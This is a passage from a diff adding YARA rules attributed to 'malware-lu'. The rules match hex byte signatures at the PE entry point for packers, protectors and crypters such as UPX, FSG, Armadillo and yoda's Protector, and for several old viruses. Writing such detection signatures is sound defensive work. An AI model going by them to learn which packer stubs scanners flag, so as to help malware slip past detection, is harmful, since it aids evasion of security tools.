+		$a0 = { 60 E8 22 00 00 00 5D 8B D5 81 ED 90 90 90 90 2B 95 90 90 90 90 81 EA 06 90 90 90 89 95 90 90 90 90 83 BD 45 00 01 00 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEV1Xcyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV220070411WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MicrosoftVisualBasic60DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 5A 68 90 90 90 90 68 90 90 90 90 52 E9 90 90 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPack14Liuxingping
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxTrivial46
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 4E B1 20 BA ?? ?? CD 21 BA ?? ?? B8 ?? 3D CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule STUDRC410JamieEditionScanTimeUnDetectablebyMarjinZ
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 2C 11 40 00 E8 F0 FF FF FF 00 00 00 00 00 00 30 00 00 00 38 00 00 00 00 00 00 00 37 BB 71 EC A4 E1 98 4C 9B FE 8F 0F FA 6A 07 F6 00 00 00 00 00 00 01 00 00 00 20 20 46 6F 72 20 73 74 75 64 00 20 54 6F 00 00 00 00 06 00 00 00 CC 1A 40 00 07 00 00 00 D4 18 40 00 07 00 00 00 7C 18 40 00 07 00 00 00 2C 18 40 00 07 00 00 00 E0 17 40 00 56 42 35 21 F0 1F 2A 00 00 00 00 00 00 00 00 00 00 00 00 00 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 00 09 04 00 00 00 00 00 00 E8 13 40 00 F4 13 40 00 00 F0 30 00 00 FF FF FF 08 00 00 00 01 00 00 00 00 00 00 00 E9 00 00 00 04 11 40 00 04 11 40 00 C8 10 40 00 78 00 00 00 7C 00 00 00 81 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 61 61 00 53 74 75 64 00 00 73 74 75 64 00 00 01 00 01 00 30 16 40 00 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 00 00 B4 16 40 00 10 30 40 00 07 00 00 00 24 12 40 00 0E 00 20 00 00 00 00 00 1C 9E 21 00 EC 11 40 00 5C 10 40 00 E4 1A 40 00 2C 34 40 00 68 17 40 00 58 17 40 00 78 17 40 00 8C 17 40 00 8C 10 40 00 62 10 40 00 92 10 40 00 F8 1A 40 00 24 19 40 00 98 10 40 00 9E 10 40 00 77 04 18 FF 04 1C FF 05 00 00 24 01 00 0D 14 00 78 1C 40 00 48 21 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSonikYouth
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8A 16 02 00 8A 07 32 C2 88 07 43 FE C2 81 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXShit006
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? E2 FA E9 D6 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SetupFactoryv6003SetupLauncher
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 61 40 00 68 70 3B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 14 61 40 00 33 D2 8A D4 89 15 5C 89 40 00 8B C8 81 E1 FF 00 00 00 89 0D 58 89 40 00 C1 E1 08 03 CA 89 0D 54 89 40 00 C1 E8 10 A3 50 89 }
+
+condition:
+		$a0
+}
+	
+	
+rule CrypKeyV61XDLLCrypKeyCanadaInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? 00 75 34 68 ?? ?? ?? ?? E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcAsmProtectorVcAsm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompact2xxSlimLoaderBitSumTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 32 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ENIGMAProtectorV11V12SukhovVladimir
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtectorv10bAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 4C 32 40 00 E8 03 00 00 00 EB 01 ?? B9 EA 47 40 00 81 E9 E9 32 40 00 8B D5 81 C2 E9 32 40 00 8D 3A 8B F7 33 C0 E8 04 00 00 00 90 EB 01 ?? E8 03 00 00 00 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherv01
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 }
+	$a1 = { 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SOFTWrapperforWin9xNTEvaluationVersion
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov200
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov201
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild014021024027GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtector1xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NSISInstallerNullSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 20 53 55 56 33 DB 57 89 5C 24 18 C7 44 24 10 ?? ?? ?? ?? C6 44 24 14 20 FF 15 30 70 40 00 53 FF 15 80 72 40 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEXv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IMPPacker10MahdiHezavehiIMPOSTER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEProtectv09
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 51 55 57 64 67 A1 30 00 85 C0 78 0D E8 ?? ?? ?? ?? 58 83 C0 07 C6 ?? C3 }
+	$a1 = { E9 ?? 00 00 00 0D 0A 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 50 45 2D 50 52 4F 54 45 43 54 20 30 2E 39 20 28 43 29 6F }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule nbuildv10soft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? BB ?? ?? C0 ?? ?? 80 ?? ?? 43 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01StelthPE101Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 BA ?? ?? ?? ?? FF E2 BA E0 10 40 00 B8 68 24 1A 40 89 02 83 C2 03 B8 40 00 E8 EE 89 02 83 C2 FD FF E2 2D 3D 5B 20 48 69 64 65 50 45 20 5D 3D 2D 90 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule IProtect10FxSubdllmodebyFuXdas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 53 75 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED B6 13 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 A8 13 40 00 8D 85 81 13 40 00 50 FF B5 A8 13 40 00 E8 92 00 00 00 0B C0 74 13 89 85 A4 13 40 00 8D 85 8E 13 40 00 50 FF 95 A4 13 40 00 8B 85 AC 13 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 98 13 40 00 89 20 89 68 04 8D 9D 4F 14 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 B5 FA FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSVisualCv8DLLhsmallsig2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B FF 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 0F 84 ?? ?? 00 00 83 FE 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSVisualCv8DLLhsmallsig1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B FF 55 8B EC 83 7D 0C 01 75 05 E8 ?? ?? ?? FF 5D E9 D6 FE FF FF CC CC CC CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16xVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv20MarkusLaszloReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }
+
+condition:
+		$a0
+}
+	
+	
+rule BladeJoinerv15
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv133Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF }
+	$a1 = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FSGv13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtMicrosoftVisualC6070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SuperDAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 F3 42 00 68 A4 BF 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 08 F2 42 00 33 D2 8A D4 89 15 60 42 43 00 8B C8 81 E1 FF 00 00 00 89 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv200alpha38
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 80 B8 BF 10 00 10 01 74 7A C6 80 BF 10 00 10 01 9C 55 53 51 57 52 56 8D 98 0F 10 00 10 8B 53 14 8B E8 6A 40 68 00 10 00 00 FF 73 04 6A 00 8B 4B 10 03 CA 8B 01 FF D0 8B F8 50 8B 33 8B 53 14 03 F2 8B 4B 0C 03 CA 8D 85 B7 10 00 10 FF 73 04 8F }
+
+condition:
+		$a0
+}
+	
+	
+rule RCryptor16cVaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule TheGuardLibrary
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeCryptor01build001GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 40 90 83 C0 07 80 38 90 90 74 02 EB FF 68 26 ?? ?? 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 FF E4 90 8B 04 24 64 A3 00 00 00 00 8B 64 24 08 90 83 C4 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02BJFNT12Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockPhantasmv08
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstall2736Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 58 BB F3 1C 00 00 2B C3 50 68 00 00 40 00 68 00 26 00 00 68 CC 00 00 00 E8 C1 FE FF FF E9 97 FF FF FF CC CC CC CC CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnnamedScrambler11Cp0ke
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 E4 53 56 33 C0 89 45 E4 89 45 E8 89 45 EC B8 C0 47 00 10 E8 4F F3 FF FF BE 5C 67 00 10 33 C0 55 68 D2 4A 00 10 64 FF 30 64 89 20 E8 EB DE FF FF E8 C6 F8 FF FF BA E0 4A 00 10 B8 CC 67 00 10 E8 5F F8 FF FF 8B D8 8B D6 8B C3 8B 0D CC 67 00 10 E8 3A DD FF FF 8B 46 50 8B D0 B8 D4 67 00 10 E8 5B EF FF FF B8 D4 67 00 10 E8 09 EF FF FF 8B D0 8D 46 14 8B 4E 50 E8 14 DD FF FF 8B 46 48 8B D0 B8 D8 67 00 ?? ?? ?? ?? ?? FF B8 D8 67 00 10 E8 E3 EE FF FF 8B D0 8B C6 8B 4E 48 E8 EF DC FF FF FF 76 5C FF 76 58 FF 76 64 FF 76 60 B9 D4 67 00 10 8B 15 D8 67 00 10 A1 D4 67 00 10 E8 76 F6 FF FF A1 D4 67 00 10 E8 5C EE FF FF 8B D0 B8 CC 67 00 10 E8 CC F7 FF FF 8B D8 B8 DC 67 00 10 }
+
+condition:
+		$a0
+}
+	
+	
+rule y0dasCrypterv1xModified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? B9 ?? ?? 00 00 8D BD ?? ?? ?? ?? 8B F7 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov252b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Upackv036betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C }
+	$a1 = { BE E0 11 ?? ?? FF 36 E9 C3 00 00 00 48 01 ?? ?? 0B 01 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 82 8E FE FF FF 58 8B 4E 40 5F E3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxNecropolis
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 FC AD 33 C2 AB 8B D0 E2 F8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinUpackv039finalrelocatedimagebaseByDwingc2005h2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 ?? ?? ?? 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD 03 C3 50 97 AD 91 F3 A5 5E AD 56 91 01 1E AD E2 FB AD 8D 6E 10 01 5D 00 8D 7D 1C B5 ?? F3 AB 5E AD 53 50 51 97 58 8D 54 85 5C FF 16 72 57 2C 03 73 02 B0 00 3C 07 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv1061bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule aPackv062
+{
+      meta:
+		author="malware-lu"
+strings:
